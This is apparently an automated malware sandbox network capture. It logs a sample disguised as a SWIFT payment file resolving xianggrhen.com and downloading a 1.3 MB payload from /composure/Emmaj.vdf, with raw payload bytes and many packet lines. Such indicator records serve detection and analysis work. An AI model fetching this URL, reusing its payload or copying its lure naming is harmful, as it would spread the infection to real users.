Dec 10, 2024 13:11:56.238811016 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.238850117 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.239305019 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.239403963 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.239444017 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.240204096 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.240216017 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.240253925 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.241050959 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.293808937 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.387803078 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.387882948 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.387943983 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.388192892 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.388272047 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.388322115 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.389060974 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.389098883 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.389147043 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.389921904 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.390178919 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.390225887 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.390911102 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.391077042 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.391124010 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.391807079 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.391917944 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.391963959 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.392680883 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.392790079 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.392833948 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.393697977 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.393764019 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.393807888 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.394596100 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.394638062 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.394682884 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.395576000 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.395744085 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.395788908 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.396644115 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.396656036 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.396697998 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.397577047 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.397856951 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.397902966 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.398644924 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.398708105 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.398752928 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.399733067 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.399941921 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.399987936 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.400698900 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.400772095 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.400820017 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.401691914 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.401704073 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.401743889 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.402622938 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.403377056 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.403435946 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.403748035 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.404166937 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.404213905 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.404692888 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.404802084 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.404848099 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.405394077 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.405987024 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.406030893 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.406071901 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.406410933 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.406460047 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.406799078 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.406883955 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.406929970 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.407659054 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.407671928 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.407725096 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.408149958 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.408163071 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.408196926 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.409001112 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.409074068 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.409120083 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.409733057 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.410428047 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.410474062 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.410670042 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.410849094 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.410893917 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.411747932 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.411858082 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.411895990 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.412632942 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.412679911 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.412724972 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.413346052 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.413357973 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.413394928 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.414385080 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.414513111 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.414558887 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.415183067 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.415311098 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.415359020 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.416214943 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.416392088 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.416436911 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.417259932 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.417371988 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.417421103 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.418029070 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.418620110 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.418667078 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.418946028 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.418957949 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.418999910 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.419766903 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.419799089 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.419846058 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.420747995 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.420849085 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.420892000 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.421533108 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.421598911 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.421642065 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.422262907 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.422275066 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.422312021 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.423068047 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.423180103 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.423228025 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.423940897 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.423957109 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.424005032 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.424731016 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.424774885 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.424818993 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.425419092 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.425431967 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.425471067 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.426084995 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.426137924 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.426183939 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.426749945 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.426760912 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.426803112 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.427444935 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.427666903 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.427709103 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.428385019 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.428509951 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.428555965 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.429203987 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.429250956 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.429294109 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.430109024 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.430389881 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.430434942 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.431402922 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.431413889 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.431456089 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.432328939 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.432568073 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.432617903 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.433470011 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.433482885 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.433518887 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.434170961 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.481345892 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.580050945 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.580183983 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.580248117 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.580890894 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.580957890 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.581005096 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.581409931 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.581489086 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.581537008 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.582217932 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.582230091 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.582282066 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.583038092 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.583050013 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.583102942 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.583864927 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.583978891 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.584027052 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.584798098 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.584836006 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.584883928 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.585711002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.585772991 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.585823059 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.586550951 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.586563110 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.586605072 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.587418079 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.587492943 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.587543964 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.588335037 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.588346958 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.588391066 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.589221001 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.589350939 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.589415073 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.590190887 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.590275049 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.590325117 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.591043949 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.591056108 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.591098070 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.591885090 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.591901064 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.591952085 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.592816114 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.592879057 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.592940092 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.593746901 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.593760014 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.593796015 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.594499111 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.594549894 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.594593048 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.595346928 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.595498085 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.595537901 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.596117973 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.596199036 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.596246004 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.597038031 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.597096920 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.597143888 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.598098040 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.598109961 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.598149061 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.599118948 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.599206924 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.599253893 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.599845886 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.599858999 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.599896908 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.600549936 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.600703001 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.600749969 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.601308107 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.601373911 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.601418972 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.602226973 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.602339029 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.602385998 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.603039980 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.603087902 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.603137016 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.603907108 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.604523897 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.604571104 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.604841948 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.604980946 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.605024099 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.605664968 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.605782986 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.605829000 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.606574059 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.606589079 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.606637955 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.607414007 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.607438087 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.607485056 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.608268976 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.609107971 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.609152079 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.609297991 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.609560966 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.609610081 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.610006094 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.610116005 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.610152960 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.610914946 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.611032009 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.611080885 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.611766100 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.611804008 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.611846924 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.612730980 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.612777948 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.612826109 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.613513947 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.613810062 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.613858938 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.614392996 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.614483118 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.614526033 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.615427017 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.615438938 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.615483046 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.616564989 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.668812990 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:59.256850958 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:59.256942987 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:12:25.198451996 CET	49706	80	192.168.2.5	45.9.191.182

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 13:11:52.749392986 CET	63690	53	192.168.2.5	1.1.1.1
Dec 10, 2024 13:11:52.891664028 CET	53	63690	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 13:11:52.749392986 CET	192.168.2.5	1.1.1.1	0xf96d	Standard query (0)	xianggrhen.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 13:11:52.891664028 CET	1.1.1.1	192.168.2.5	0xf96d	No error (0)	xianggrhen.com		45.9.191.182	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

xianggrhen.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	45.9.191.182	80	6600	C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 13:11:53.044655085 CET	83	OUT	GET /composure/Emmaj.vdf HTTP/1.1 Host: xianggrhen.com Connection: Keep-Alive
Dec 10, 2024 13:11:54.257093906 CET	267	IN	HTTP/1.1 200 OK etag: "13e408-6757e73f-17cc73;;;" last-modified: Tue, 10 Dec 2024 07:01:19 GMT content-type: application/octet-stream content-length: 1303560 accept-ranges: bytes date: Tue, 10 Dec 2024 12:11:54 GMT server: LiteSpeed connection: Keep-Alive
Dec 10, 2024 13:11:54.257561922 CET	1236	IN	Data Raw: 84 10 af f0 bf 82 16 e6 43 e8 44 0b cb a1 11 35 b0 78 25 3d 9d 5b 9c 11 c1 af fb f8 f3 6c 6d 38 52 64 f9 71 ca db 77 8c ac 8f 91 b7 31 a5 cb 8f 72 ae 94 d6 89 91 18 9d 3d db c7 8c 82 d9 b0 e0 a1 27 9f 4a 8c 89 3e 2f 96 4e f7 37 de 9b 4f 63 1e bb Data Ascii: CD5x%=[lm8Rdqw1r='J>/N7OcY>[D?4N\\|hYC4lYmVwb=+2Zdd~iU7\|&-oN!kH2vJ\gQ_t^ODE(DP:k"%
Dec 10, 2024 13:11:54.257678032 CET	1236	IN	Data Raw: 09 c7 4c 77 8b c9 25 dc 1a 50 98 a6 8f 20 cb bc aa 1c fa 34 22 ff df 5a d8 d2 a1 9f 38 12 b5 09 12 90 dc 04 b2 04 a5 e7 d1 ef 08 a0 9a e7 5c 32 59 9a f5 61 c8 d4 d0 71 82 ed 3e 50 72 b9 2b 6a b7 63 c0 b0 5b 5a 58 65 3f f4 09 7f e3 99 6b a7 48 71 Data Ascii: Lw%P 4"Z8\2Yaq>Pr+jc[ZXe?kHq\;nCy'>r-JWPyyyDX(6,'?C'FrUIDv@d*q{-@?[@AL('VAn5B!E8s2_{h4\wSje5
